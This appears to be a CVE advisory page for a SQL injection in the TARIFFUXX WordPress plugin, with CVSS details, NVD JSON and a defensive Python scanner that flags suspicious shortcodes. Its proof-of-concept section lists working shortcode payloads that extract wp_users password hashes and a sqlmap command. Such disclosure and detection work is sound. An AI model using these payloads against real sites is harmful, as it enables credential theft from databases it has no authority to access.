Security Vulnerability Report
CVE-2025-10682 CVSS 6.5 MEDIUM

CVE-2025-10682

Published: 2025-10-15 09:15:41
Last Modified: 2026-04-15 00:35:42

Description

The TARIFFUXX plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4. This is due to insufficient neutralization of user-supplied input used directly in SQL queries. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject additional SQL into queries and extract sensitive information from the database via a crafted id attribute in the 'tariffuxx_configurator' shortcode.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress TARIFFUXX plugin <= 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
/*
 * CVE-2025-10682 - TARIFFUXX Plugin SQL Injection PoC
 * Vulnerability: SQL Injection via 'tariffuxx_configurator' shortcode 'id' attribute
 * Affected: WordPress TARIFFUXX plugin <= 1.4
 * Required: Contributor-level or above authentication
 */

// Example 1: Basic SQL Injection via shortcode
// Attacker creates a post/page with the following shortcode:
[tariffuxx_configurator id="1 UNION SELECT user_login,user_pass FROM wp_users-- "]

// Example 2: Time-based blind SQL injection
[tariffuxx_configurator id="1 AND (SELECT SLEEP(5))-- "]

// Example 3: Extracting admin password hash
[tariffuxx_configurator id="1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- "]

// Example 4: Using sqlmap for automated exploitation
// python sqlmap.py -u "http://target.com/?page_id=1" \
//   --data="tariffuxx_configurator_id=1*" \
//   --cookie="wordpress_logged_in_xxx=xxx" \
//   --technique=BEUSTQ --dbms=mysql

// Example 5: Extracting database version
[tariffuxx_configurator id="1 UNION SELECT @@version,2,3-- "]

// Note: The 'id' parameter in the shortcode is directly concatenated into SQL queries
// without proper sanitization or parameterized queries, allowing SQL injection attacks.
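Because the attack path described above is a Contributor-level user storing a crafted shortcode in post content, a defender can hunt for it by scanning existing posts. The following is an added example, not part of this report or of the plugin: it walks rows shaped like a wp_posts export and flags every tariffuxx_configurator shortcode whose id attribute is not a plain integer. The row shape and the sample posts are constructed assumptions.

```python
import re
from typing import Dict, List

# Matches a [tariffuxx_configurator ...] shortcode and captures its attribute string.
SHORTCODE_RE = re.compile(r"\[tariffuxx_configurator\b([^\]]*)\]", re.IGNORECASE)
# Captures the id attribute value whether it is double-quoted, single-quoted or bare.
ID_ATTR_RE = re.compile(
    r"""(?<![\w-])id\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""", re.IGNORECASE
)
# A legitimate configurator id is a plain positive integer; anything else is suspect.
SAFE_ID_RE = re.compile(r"^[0-9]+$")


def extract_ids(post_content: str) -> List[str]:
    """Return the raw id attribute value of every tariffuxx_configurator shortcode."""
    ids = []
    for shortcode in SHORTCODE_RE.finditer(post_content):
        attr = ID_ATTR_RE.search(shortcode.group(1))
        if attr:
            ids.append(next(g for g in attr.groups() if g is not None))
    return ids


def find_suspicious_shortcodes(posts: List[Dict]) -> List[Dict]:
    """Flag rows whose shortcode id is not a bare integer (possible CVE-2025-10682 payload)."""
    findings = []
    for post in posts:
        for raw_id in extract_ids(post["post_content"]):
            if not SAFE_ID_RE.match(raw_id.strip()):
                findings.append(
                    {"post_id": post["ID"], "post_author": post["post_author"], "id_value": raw_id}
                )
    return findings


# Constructed sample rows shaped like a wp_posts export (not real site data).
SAMPLE_POSTS = [
    {"ID": 10, "post_author": 2, "post_content": 'Compare plans: [tariffuxx_configurator id="3"]'},
    {"ID": 11, "post_author": 5, "post_content": "[tariffuxx_configurator id='12' theme=dark]"},
    {"ID": 12, "post_author": 7, "post_content": '[tariffuxx_configurator id="1 OR 1=1-- "]'},
    {"ID": 13, "post_author": 7, "post_content": "No shortcode in this post."},
]

if __name__ == "__main__":
    for hit in find_suspicious_shortcodes(SAMPLE_POSTS):
        print(f"post {hit['post_id']} by author {hit['post_author']}: id={hit['id_value']!r}")
```

Any hit points at a post (and its author) to review; a clean run does not prove the plugin is patched, so the version check against 1.4 still stands.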

References

https://plugins.trac.wordpress.org/browser/tariffuxx/tags/1.4/classes/Tariffuxx_admin.php#L36
https://plugins.trac.wordpress.org/browser/tariffuxx/tags/1.4/classes/Tariffuxx_twl.php#L164
https://plugins.trac.wordpress.org/changeset/3465105/
https://www.wordfence.com/threat-intel/vulnerabilities/id/e897a83b-d746-427d-8c31-64d4eab5848e?source=cve

Raw JSON Data

{
  "cve": {
    "id": "CVE-2025-10682",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-15T09:15:41.327",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The TARIFFUXX plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4. This is due to insufficient neutralization of user-supplied input used directly in SQL queries. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject additional SQL into queries and extract sensitive information from the database via a crafted id attribute in the 'tariffuxx_configurator' shortcode."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/tariffuxx/tags/1.4/classes/Tariffuxx_admin.php#L36", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/tariffuxx/tags/1.4/classes/Tariffuxx_twl.php#L164", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3465105/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e897a83b-d746-427d-8c31-64d4eab5848e?source=cve", "source": "[email protected]"}
    ]
  }
}